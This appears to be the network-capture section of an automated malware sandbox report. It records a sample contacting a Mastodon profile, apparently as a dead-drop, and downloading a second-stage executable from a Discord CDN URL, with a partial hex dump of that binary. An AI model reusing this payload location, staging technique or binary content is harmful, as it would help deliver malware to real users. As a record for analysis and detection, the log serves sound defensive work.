Oct 16, 2021 16:53:36.567069054 CEST	3973	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 16 Oct 2021 14:53:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 35 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 15 c8 49 0e 80 20 0c 00 c0 1f d1 4a 2d 8b be 86 14 12 4c 64 89 f4 e0 f3 8d 73 9c aa 3a 0f 00 c9 dd e4 6b c9 78 72 9a d3 c8 68 90 54 93 d4 56 ba 2e 08 31 38 0a 7e a3 18 98 d0 f2 8e 7f 45 e4 e8 d1 b1 a7 9d 9d 75 90 6e 53 de 72 7e 5d 03 1e 44 53 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 5eI J-Lds:kxrhTV.18~EunSr~]DS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49751	162.159.130.233	80	C:\Users\user\Desktop\MSQNZmmg2F.exe

Timestamp	kBytes transferred	Direction	Data
Oct 16, 2021 16:53:36.738838911 CEST	3974	OUT	GET /attachments/898638713985302540/898905970657345626/al.exe HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: cdn.discordapp.com Connection: Keep-Alive
Oct 16, 2021 16:53:36.773227930 CEST	3975	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 16 Oct 2021 14:53:36 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Sat, 16 Oct 2021 15:53:36 GMT Location: https://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FnYYxy4wmXfO27BO0sDvWMbKeqDtVZUyFjm5mcXUorRYMyCeAY%2FSopmd4g6ojQHMjk0kfuZZedm00AiMuY4Qezwq6ZsfAVWw0JeYH6WfZx8fKUnd4QdE3mJ5NhQ3Rb%2Bd5wfhpQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 69f21e20be4a6946-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49736	88.99.75.82	443	C:\Users\user\Desktop\MSQNZmmg2F.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-16 14:53:22 UTC	0	OUT	GET /@oleg98 HTTP/1.1 Host: mas.to
2021-10-16 14:53:22 UTC	0	IN	HTTP/1.1 200 OK Date: Sat, 16 Oct 2021 14:53:22 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Server: Mastodon X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Permissions-Policy: interest-cohort=() Link: <https://mas.to/.well-known/webfinger?resource=acct%3Aoleg98%40mas.to>; rel="lrdd"; type="application/jrd+json", <https://mas.to/users/oleg98>; rel="alternate"; type="application/activity+json" Vary: Accept, Accept-Encoding, Origin Cache-Control: max-age=0, public ETag: W/"38b39cc53ceda78f7bf0356a7413380f" Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://mas.to; img-src 'self' https: data: blob: https://mas.to; style-src 'self' https://mas.to 'nonce-rIJD8+3KEEUa9bZAW6vJjA=='; media-src 'self' https: data: https://mas.to; frame-src 'self' https:; manifest-src 'self' https://mas.to; connect-src 'self' data: blob: https://mas.to https://media.mas.to wss://mas.to; script-src 'self' https://mas.to; child-src 'self' blob: https://mas.to; worker-src 'self' blob: https://mas.to Set-Cookie: _mastodon_session=mpr7Fdahfo3DO1rSPb8%2Bht68Xg8l9IoAFtPuyRs%2BSiRnfPEdLjIHtnHbnMjSxwCg85p95p%2B%2FS7f93KNzDaap%2BEw4E6eaXLFprxJJUGUKcWIuA7TnBEBf6ZN2SwOhNcoj17xbyERU6%2Fsmr4bDv5wA9GR448lQIJjE%2F0w%2F6P%2BlSrDmdSPypOPtMBTQyOIc0wjLyrc%2Br%2FE4JCGw5RGjQLEork%2FlLhGSbzDSGGRLlws307McNwOE47gGPYdqtuAX3X%2B2vLKBm2SC8tMpZj3nNklKlJuVopUVtqt%2FHEEog57U0GfvbfnQmXycwHfFLiaLklJ%2BXkBlJ5IEv3PYbQ7sWy%2FvgKr8pOMV%2FNtV5NuAONSzeXPY--SrzjmKvvjpSYM6uv--M2LfL8CSkFfOW0vYmu6vhQ%3D%3D; path=/; secure; HttpOnly; SameSite=Lax X-Request-Id: 16d3739d-d76d-499e-a1c4-a70c521c42b0 X-Runtime: 0.051322 Strict-Transport-Security: max-age=63072000; includeSubDomains X-Cached: MISS Strict-Transport-Security: max-age=31536000
2021-10-16 14:53:22 UTC	1	IN	Data Raw: 35 30 32 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 73 Data Ascii: 502c<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
2021-10-16 14:53:22 UTC	16	IN	Data Raw: 2d 31 37 2e 34 31 37 39 37 20 32 32 2e 33 35 33 35 31 36 76 33 32 2e 33 37 35 30 30 32 48 39 36 2e 32 30 37 30 33 31 56 38 35 2e 34 32 33 38 32 38 63 30 2d 31 34 2e 38 34 35 2d 35 2e 38 31 35 34 36 38 2d 32 32 2e 33 35 33 35 31 35 2d 31 37 2e 34 31 37 39 36 39 2d 32 32 2e 33 35 33 35 31 36 2d 31 30 2e 34 39 33 37 35 20 30 2d 31 35 2e 37 34 30 32 33 34 20 36 2e 33 33 30 30 37 39 2d 31 35 2e 37 34 30 32 33 34 20 31 38 2e 37 39 38 38 32 39 76 35 39 2e 31 34 38 34 33 39 48 33 38 2e 39 30 34 32 39 37 56 38 30 2e 30 37 36 31 37 32 63 30 2d 31 32 2e 34 35 35 20 33 2e 31 37 31 30 31 36 2d 32 32 2e 33 35 31 33 32 38 20 39 2e 35 34 31 30 31 35 2d 32 39 2e 36 37 33 38 32 38 20 36 2e 35 36 38 37 35 31 2d 37 2e 33 32 32 35 20 31 35 2e 31 37 32 38 31 33 2d 31 31 2e 30 Data Ascii: -17.41797 22.353516v32.375002H96.207031V85.423828c0-14.845-5.815468-22.353515-17.417969-22.353516-10.49375 0-15.740234 6.330079-15.740234 18.798829v59.148439H38.904297V80.076172c0-12.455 3.171016-22.351328 9.541015-29.673828 6.568751-7.3225 15.172813-11.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49752	162.159.130.233	443	C:\Users\user\Desktop\MSQNZmmg2F.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-16 14:53:37 UTC	21	OUT	GET /attachments/898638713985302540/898905970657345626/al.exe HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Connection: Keep-Alive Host: cdn.discordapp.com
2021-10-16 14:53:37 UTC	22	IN	HTTP/1.1 200 OK Date: Sat, 16 Oct 2021 14:53:37 GMT Content-Type: application/x-msdos-program Content-Length: 7079424 Connection: close CF-Ray: 69f21e229e4163d7-FRA Accept-Ranges: bytes Age: 9323 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=al.exe ETag: "d9c2993126c94ccfd546f3a9f3f84ab5" Expires: Sun, 16 Oct 2022 14:53:37 GMT Last-Modified: Sat, 16 Oct 2021 12:11:24 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1634386284407896 x-goog-hash: crc32c=OI7UVg== x-goog-hash: md5=2cKZMSbJTM/VRvOp8/hKtQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7079424 X-GUploader-UploadID: ADPycduhLKOA_xA0dfQ8gsuWEWOJ3HpdvMqxkALop4UVYLjCaYWDsu0tJxKw-T4AvkQnUw2VfE3pvPeM3z0r1Piea-sSlO_bRg X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2021-10-16 14:53:37 UTC	23	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 58 64 61 65 6a 67 79 55 6a 31 6b 48 33 78 45 44 4a 31 7a 44 4e 63 45 49 53 76 46 52 6c 79 78 34 41 44 6d 43 25 32 46 46 68 66 34 78 70 58 48 69 69 6c 56 5a 65 63 67 71 45 49 72 6e 31 42 76 34 58 58 64 59 33 49 32 67 74 77 42 43 4e 51 54 39 36 49 54 73 25 32 46 25 32 42 69 41 30 4e 35 6d 38 72 71 50 6d 43 34 59 30 25 32 46 6e 42 78 70 46 47 5a 32 4b 70 51 58 34 52 48 4d 41 79 59 34 68 73 30 6a 41 30 68 54 48 42 6d 70 6f 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XdaejgyUj1kH3xEDJ1zDNcEISvFRlyx4ADmC%2FFhf4xpXHiilVZecgqEIrn1Bv4XXdY3I2gtwBCNQT96ITs%2F%2BiA0N5m8rqPmC4Y0%2FnBxpFGZ2KpQX4RHMAyY4hs0jA0hTHBmpow%3D%3D"}],"group":"cf-nel","max_age
2021-10-16 14:53:37 UTC	23	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 22 b7 c5 5b 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 fe 6b 00 00 06 00 00 00 00 00 00 de 1d 6c 00 00 20 00 00 00 20 6c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 6c 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"[kl l@ `l`
2021-10-16 14:53:37 UTC	25	IN	Data Raw: ba 92 ac c3 99 9d ab 4a 88 7b 83 a4 83 75 ba 18 ba 88 ac de 99 d8 ab 54 88 75 83 b5 83 05 ba 6d 31 2e 31 6e 31 26 0a 13 0a 88 1c c5 29 c1 1b 4b 38 73 33 a9 33 21 0a 1b 0a 84 1c c3 29 ff 1b 4a 38 73 33 b4 33 2d 0a 15 0a 95 1c d0 29 f0 1b 19 38 6a 33 b5 33 3a 0a 1a 0a c1 1c 9b 29 80 1b 4d 38 64 33 bf 33 24 0a 19 0a b2 1c 17 ee 02 ee 13 ee 41 d5 74 d5 f4 c3 bf f6 b9 c4 2c e7 39 ec 80 ec 5f d5 69 d5 e9 c3 ad f6 fa c4 69 e7 5d ec d4 ec 51 d5 63 d5 f7 c3 ae f6 89 c4 30 3a 61 3a 35 3a da 10 59 33 35 38 e9 38 4a 01 45 01 f5 17 cc 22 98 10 16 33 3f 38 ef 38 62 01 01 01 d2 17 83 22 94 10 10 33 3b 38 f5 38 61 01 52 01 d5 17 8b 22 98 10 16 33 05 38 f4 38 61 01 4f 01 d9 17 85 22 89 10 05 33 2a 38 a7 38 78 01 4e 01 ce 17 8a 22 dd 10 4e 33 7a 38 f3 38 76 01 44 01 d0 17 Data Ascii: J{uTum1.1n1&)K8s33!)J8s33-)8j33:)M8d33$At,9_ii]Qc0:a:5:Y3588JE"3?88b"3;88aR"388aO"3*88xN"N3z88vD
2021-10-16 14:53:37 UTC	26	IN	Data Raw: fe bd 12 9e 78 95 bf 95 26 ac 1a ac 9e ba d4 8f c2 bd 5d 9e 7c 95 a1 95 02 ac 41 9a 0c 9a 59 9a e8 b0 67 93 44 98 95 98 01 a1 22 a1 ed b7 ee 82 e5 b0 7d 93 5f 98 d6 98 01 a1 24 a1 a8 b7 f1 82 e9 b0 71 93 0b 98 99 98 10 a1 70 a1 b9 b7 f3 82 ed b0 62 93 0b 98 83 98 0b a1 29 a1 ed b7 f0 82 fe b0 7c 93 4d 98 98 98 0b a1 33 a1 ed b7 f8 82 ff b0 74 93 4e 98 9a 98 34 a1 51 57 44 57 48 57 f9 7d 66 5e 5a 55 96 55 27 6c 60 6c b8 7a e0 4f f3 7d 56 5e 1b 55 96 55 21 6c 60 6c ba 7a e3 4f f5 7d 60 5e 5e 55 94 55 32 6c 7a d8 35 d8 60 d8 d1 f5 9b c0 d8 f2 60 d1 4f da b9 da 31 e3 0e e3 9b f5 d2 c0 d9 f2 47 d1 7f da bd da 2f e3 2a e3 d6 f5 c3 c0 c5 f2 4b d1 78 da ba da 7f e3 18 e3 82 f5 c8 c0 d2 f2 43 d1 64 da a3 da 36 e3 04 e3 86 f5 d6 c0 f6 f2 0e d1 7d da a2 da 2d e3 0d Data Ascii: x&]\|AYgD"}_$qpb)\|M3tN4QWDWHW}f^ZUU'l`lzO}V^UU!l`lzO}`^^UU2lz5``O1G/*KxCd6}-
2021-10-16 14:53:37 UTC	27	IN	Data Raw: 50 26 7a a6 59 8b 52 43 52 c7 6b f5 6b 68 7d 2e 48 19 7a f3 59 88 52 44 52 c3 6b f2 6b 7b 7d 0e 48 ec 5c fb 5c df 5c 14 71 48 44 55 76 96 55 e1 5e 32 5e af 67 93 67 0f 71 53 44 7e 76 cb 55 f2 5e 35 5e ac 67 94 67 14 71 51 44 71 76 e4 55 da 5e 75 5e e7 67 11 08 15 08 25 08 a6 10 b2 22 33 01 18 0a 85 e1 86 e1 b0 e1 b4 e8 9a e3 53 e3 6a d7 69 d7 5c d7 f1 d5 25 ec 13 ec 20 d8 25 d8 17 d8 ee da 70 e3 58 e3 c3 f5 8c c0 12 e4 14 e4 2a e4 0a e6 cf e6 50 df 67 df cd c9 bd fc 09 ea 0b ea 30 ea 5e d1 c4 c7 2b 97 29 97 11 97 be bd 25 9e c7 96 c2 96 fc 96 61 bc f9 9f d7 94 5c 94 8c ad b5 61 b0 61 89 61 19 4b d1 68 af 63 2e 63 fe 5a 29 b2 2c b2 14 b2 8e 98 17 bb 24 b0 e6 b0 76 89 28 d7 2d d7 16 d7 96 fd 17 de 20 d5 f1 d5 6f ec 40 a9 5b a9 7f a9 10 ab 93 ab 04 92 34 92 Data Ascii: P&zYRCRkkh}.HzYRDRkk{}H\\\qHDUvU^2^ggqSD~vU^5^ggqQDqvU^u^g%"3Sji\% %pX*Pg0^+)%a\aaaKhc.cZ),$v(- o@[4
2021-10-16 14:53:37 UTC	29	IN	Data Raw: 31 b9 fe af 8f 9a bc a8 25 8b 1e 80 e8 80 18 b9 78 b9 f4 af b2 9a f0 a8 3a 8b 1b 80 c6 80 51 b9 4e b9 b1 af a4 9a a4 a8 28 8b 13 80 da 80 4d b9 e8 1e f7 1e a3 1e a5 1c 62 1c a2 25 b7 25 17 33 5d 06 56 34 d3 17 ec 1c 38 1c ac 25 90 25 20 33 18 06 02 34 8c 17 a5 1c 62 1c a2 25 b7 25 0a 33 5b 06 4c 34 cf 17 f1 1c 36 1c a0 25 9d 25 25 33 18 06 02 34 72 5b 78 5b 3e 5b 44 60 c3 76 c1 43 f1 71 42 52 6a 59 a4 59 00 60 4f 60 d9 76 6b a9 65 a9 26 a9 69 92 47 92 a3 84 fe b1 d5 83 4b a0 6f ab b9 ab 27 92 0e 92 86 84 e7 b1 8a 83 18 a0 f6 50 e6 50 b8 50 85 59 a1 52 24 52 be 6b 86 6b 34 7d 4e 48 49 7a c3 59 cb 52 6d 52 da 6b ee 6b 73 7d 20 48 1c 7a 43 a6 4a a6 0c a6 75 9d f2 8b f0 be c0 8c 73 af 4c a4 b6 a4 4a 9d 75 9d d3 12 df 12 83 12 78 3f 32 0a 7b 38 ea 1b d8 10 2a Data Ascii: 1%x:QN(Mb%%3]V48%% 34b%%3[L46%%%34r[x[>[D`vCqBRjYY`O`vke&iGKo'PPPYR$Rkk4}NHIzYRmRkks} HzCJusLJux?2{8*
2021-10-16 14:53:37 UTC	30	IN	Data Raw: 07 cd 07 53 11 16 24 12 16 ae 35 c7 a7 c1 a7 a3 a7 e0 ae c8 a5 1c a5 80 9c b7 9c 1f 8a 67 d8 69 d8 02 d8 8d f2 0e d1 79 da be da 27 e3 1b e3 9f f5 c9 c0 cb f2 43 d1 68 da 94 da 6e e3 51 e3 1e 98 13 98 78 98 f4 b2 77 91 11 9a c5 9a 59 a3 6e a3 fe b5 ab 80 b2 b2 3c 91 35 9a 85 9a 1c a3 9f 15 87 15 f8 15 e2 2e 66 38 25 0d 21 3f ae 1c 96 17 4b 17 cf 2e dd 2e 33 38 30 0d 37 3f bf 1c 94 17 4c 17 ca 2e db 2e 33 38 31 0d 3d 3f bf 1c 96 17 47 17 fe 2e 6c a4 76 a4 04 a4 c4 8e 4c ad 63 a6 b7 a6 2c 9f 39 9f c0 89 df bc d5 8e 18 ad 42 a6 92 a6 69 9f 0e 9f 92 89 df bc d5 8e 5b ad 69 a6 9f a6 69 9f 0f 9f 85 89 c4 bc cf 8e 7d ad 72 80 28 80 1b 80 a9 82 3a bb 02 bb 86 ad 80 98 cd aa 43 89 6f 82 a0 82 3e bb 15 bb 8a ad dc 98 d0 aa 56 89 7d 82 b7 82 78 bb 17 bb 90 ad cb 98 Data Ascii: S$5giy'ChnQxwYn<5.f8%!?K..3807?L..381=?G.lvLc,9Bi[ii}r(:Co>V}x
2021-10-16 14:53:37 UTC	31	IN	Data Raw: 95 68 59 68 c2 51 ff 51 43 47 e6 bb f1 bb 9c bb ec 80 9a 80 05 96 59 a3 05 91 d7 b2 e0 b9 36 b9 ac 80 98 80 0d 96 14 a3 5c 91 c5 b2 fb b9 7e b9 ec 80 cd 80 19 96 4a a3 5f 91 c6 b2 e4 b9 45 16 50 16 3e 16 4f 2d 39 2d a6 3b fa 0e a6 3c 76 1f 41 14 9b 14 02 2d 7a 2d be 3b ee 0e ff 3c 3e 1f 00 14 c8 14 13 2d 24 2d bd 3b ed 0e e0 3c 1a 06 16 06 66 06 78 3d fa 2b af 1e b6 2c 3a 0f 15 04 e9 04 1f 3d 6f 3d e4 2b a7 1e 80 2c 7d 1b 69 1b 00 1b 85 36 d1 03 c2 31 07 12 64 19 ae 19 2a 20 0d 20 a6 36 fe 03 d9 31 5d 12 78 19 ba 19 31 20 3e 20 ad 36 fd 03 9e 31 07 12 04 30 5d 30 7a 30 02 32 de 32 40 0b 6d 0b a6 1d ab 28 a5 1a 39 39 0f 32 c7 32 44 0b 71 0b ec 1d aa 28 a8 1a 27 39 41 32 c7 32 4f 0b 70 0b e6 1d b7 28 b9 1a 3d 39 01 32 d0 32 1a 0b 78 0b ed 1d ac 28 ba 1a 29 Data Ascii: hYhQQCGY6\~J_EP>O-9-;<vA-z-;<>-$-;<fx=+,:=o=+,}i61d* 61]x1 > 610]0z022@m(9922Dq('9A22Op(=922x()
2021-10-16 14:53:37 UTC	33	IN	Data Raw: e5 0e d7 83 f4 fb ff 2c ff b4 c6 d4 c6 5e d0 08 e5 10 d7 80 f4 88 ff 83 1f 03 1e 0e 1f 69 35 ff 16 c9 1d 14 1d 86 24 b2 24 2f 32 7f 07 6e 35 f7 16 e3 1d 47 1d c3 24 e7 24 63 32 3e 07 18 35 f7 16 c0 1d 58 1d ca 24 fb 24 4d 32 00 07 22 35 b6 16 9d 1d 5d 1d d6 24 e1 24 60 32 17 07 62 35 b2 16 9d 1d 55 1d c2 24 cd 24 61 32 30 07 27 35 a4 16 9a 1d 5d 1d cb 24 f6 24 6e 32 73 07 21 35 99 16 b6 1d 50 1d c3 24 d0 24 23 32 3a 07 23 35 b6 16 a7 1d 6b 1d c2 24 e0 24 6e 32 08 07 62 35 b8 16 a7 1d 6b 1d c2 24 e0 24 6e 32 08 07 62 35 b2 16 84 1d 55 1d e8 24 cd 24 6a 32 2c 07 3c 35 a2 16 a7 1d 18 1d e2 24 db 24 50 32 3a 07 3d 35 a5 16 9c 1d 7a 1d 8a 24 f7 24 62 32 3e 07 00 35 88 16 8a 1d 5b 1d e2 24 be 24 4b 32 16 07 11 35 b4 16 86 1d 70 1d 8a 24 f7 24 62 32 3e 07 20 35 Data Ascii: ,^i5$$/2n5G$$c2>5X$$M2"5]$$`2b5U$$a20'5]$$n2s!5P$$#2:#5k$$n2b5k$$n2b5U$$j2,<5$$P2:=5z$$b2>5[$$K25p$$b2> 5
2021-10-16 14:53:37 UTC	34	IN	Data Raw: bd 0c 26 2f 44 24 d9 24 4a 1d 78 1d ff 0b af 3e a4 0c 39 2f 0e 24 f6 24 41 1d 63 1d ed 0b 8b 3e 92 0c 3d 2f 1e 24 d8 24 55 1d 78 1d de 0b 80 3e 91 0c 7a 2f 44 24 dc 84 87 84 7b 84 e4 8d db 86 0a 86 81 bf e3 bf 3e a9 6f 9c 78 ae fb 8d c5 86 02 86 94 bf a9 bf 31 a9 64 9c 63 ae e9 8d c1 86 44 86 8d bf a3 bf 35 a9 6e 9c 7e ae f8 8d db 86 04 86 9a bf f6 bf 3d a9 65 9c 65 ae fb 8d cf 86 38 86 8d bf a3 bf 35 a9 6d 9c 74 ae ef 8d d7 86 05 86 98 bf 80 bf 34 a9 72 9c 7e ae eb 8d d3 86 39 86 8d bf a3 bf 35 a9 69 9c 65 ae e9 8d e6 86 44 86 6b f2 3a f2 c3 f2 5d c9 da df f8 ea e8 d8 60 fb 75 f0 b2 f0 2b c9 17 c9 93 df d9 ea cf d8 50 fb 71 f0 ac f0 0f c9 5a c9 82 df c5 ea c3 d8 57 fb 76 f0 fc f0 3d c9 0e c9 89 df d2 ea cb d8 4b fb 6f f0 b5 f0 21 c9 0a c9 97 df f6 ea 86 Data Ascii: &/D$$Jx>9/$$Ac>=/$$Ux>z/D${>ox1dcD5n~=ee85mt4r~95ieDk:]`u+PqZWv=Ko!
2021-10-16 14:53:37 UTC	35	IN	Data Raw: 4d 87 4d 46 74 68 74 ef 62 a3 57 b3 65 23 46 1b 4d ce 4d 71 74 5e 74 ef 62 b8 57 b3 65 21 46 13 4d d3 4d 54 74 51 74 7e 16 67 16 c7 16 97 3b d6 0e d6 3c 46 1f 71 14 8d 14 7b 2d 00 2d 86 3b 82 0e c0 3c 43 1f 67 14 a6 14 35 2d 08 2d 93 3b cb 0e f7 3c 0a 1f 66 14 ac 14 2f 2d 01 2d b7 3b e9 f1 ba f1 53 f1 03 db 80 f8 ec f3 10 f3 93 ca 8b ca 0c dc 46 e9 4b db d3 f8 e4 f3 3f f3 a5 ca bc ca 45 dc 50 e9 56 db d8 f8 eb f3 29 f3 ec ca 8b ca 0c dc 46 e9 4b db d3 f8 e4 f3 3f f3 a5 ca bc ca 3a dc 46 e9 50 db d3 f8 e6 f3 37 f3 b8 ca 99 ca 35 dc 15 e9 49 db d2 f8 f1 f3 38 f3 ec ca 9d ca 11 dc 50 e9 48 db d8 f8 c7 f3 f1 cd f0 cd 4a cd 8c f6 95 e8 94 e8 29 e8 1a c2 3e c1 3f c1 83 c1 4a fa ea 1d eb 1d 54 1d 1a 37 83 9a 82 9a 3c 9a f4 a1 b0 00 a2 00 70 00 1f 18 14 2a 97 09 Data Ascii: MMFthtbWe#FMMqt^tbWe!FMMTtQt~g;<Fq{--;<Cg5--;<f/--;SFK?EPV)FK?:FP75I8PHJ)>?JT7<p*
2021-10-16 14:53:37 UTC	37	IN	Data Raw: 6c 4e 91 6d a2 66 16 66 d7 5f e4 5f 63 49 38 7c 25 4e a1 6d 8a 66 66 66 84 5f e2 5f 68 49 29 7c 22 4e 90 6d 8e 1c c1 1c 5b 1c b8 27 3f 31 3d 04 2d 36 85 15 80 1e 70 1e 8b 27 fa 27 70 31 37 04 2b 36 ad 15 c4 1e 57 1e c4 27 f6 27 76 31 33 04 31 36 ae 15 97 1e 50 1e cc 27 fa 27 70 31 0d 04 30 36 ae 15 8a 1e 5c 1e c2 27 eb 27 63 31 22 04 63 36 b7 15 8b 1e 4b 1e cd 27 bf 27 67 31 26 04 26 36 b6 15 81 1e 7d 1e 14 8f 0f 8f c2 8f bc 97 a9 a5 32 86 50 8d cd 8d 5e b4 6c b4 ec a2 a9 97 ab a5 34 86 0d 8d ca 8d 56 b4 60 b4 ea a2 97 97 b0 a5 34 86 11 8d d3 8d 58 b4 57 b4 c4 a2 94 97 f7 a5 6e 86 93 cf 95 cf 44 cf 7a e2 23 d7 39 e5 a9 c6 90 cd 77 cd 44 7f 43 7f 9c 7f 05 44 30 44 a1 52 ea 67 fb 55 71 76 63 7d 4b bb c9 bb 92 bb fb a3 eb 91 7e b2 59 b9 d2 b9 00 80 35 80 ae Data Ascii: lNmff__cI8\|%Nmfff__hI)\|"Nm['?1=-6p''p17+6W''v1316P''p106\''c1"c6K''g1&&6}2P^l4V`4XWnDz#9wDCD0DRgUqvc}K~Y5
2021-10-16 14:53:37 UTC	38	IN	Data Raw: 9a 48 8c 2e b9 d8 05 9d 05 32 05 95 07 52 07 92 3e 87 3e 20 28 6a 1d 70 2f e1 0c cb 07 00 07 91 3e b9 3e 39 28 41 1d 35 2f f8 0c d7 07 1c 07 dd 3e af 3e 32 28 65 1d 61 2f ff 0c ed 07 1d 07 98 3e a1 3e 20 28 6b 1d 35 2f e9 0c c6 07 0e 07 99 3e b9 3e 21 28 17 5d 1f 5d fc 5d ec 45 e7 77 26 54 10 5f c1 5f 7c 66 2a 66 bc 70 1c c4 14 c4 f0 c4 1e ff 30 ff e9 e9 b4 dc a4 ee 0c cd 5a c6 8c c6 45 e8 53 e8 a8 e8 9e ea 15 d3 32 d3 ba c5 fc f0 eb c2 72 e1 5a ea a1 ea 40 d3 31 d3 bd c5 f8 f0 ec c2 61 e1 7a ea d2 ea 06 d3 32 d3 a8 c5 ed f0 db c2 dc 2c 98 2c 32 2c 9c 17 b9 17 35 01 6c 34 74 06 cc 25 96 2e 04 2e 8d 17 e3 17 7e 01 6f 34 5f 06 a8 25 c2 2e 05 2e 9c 17 a0 17 29 01 6f 34 7d 06 f8 25 db 2e 2e 2e d9 17 ab 17 36 01 61 34 65 06 db 25 96 2e 19 2e 9c 17 b9 17 3e 01 Data Ascii: H.2R>> (jp/>>9(A5/>>2(ea/>> (k5/>>!(]]]Ew&T__\|f*fp0ZES2rZ@1az2,,2,5l4t%..~o4_%..)o4}%...6a4e%..>
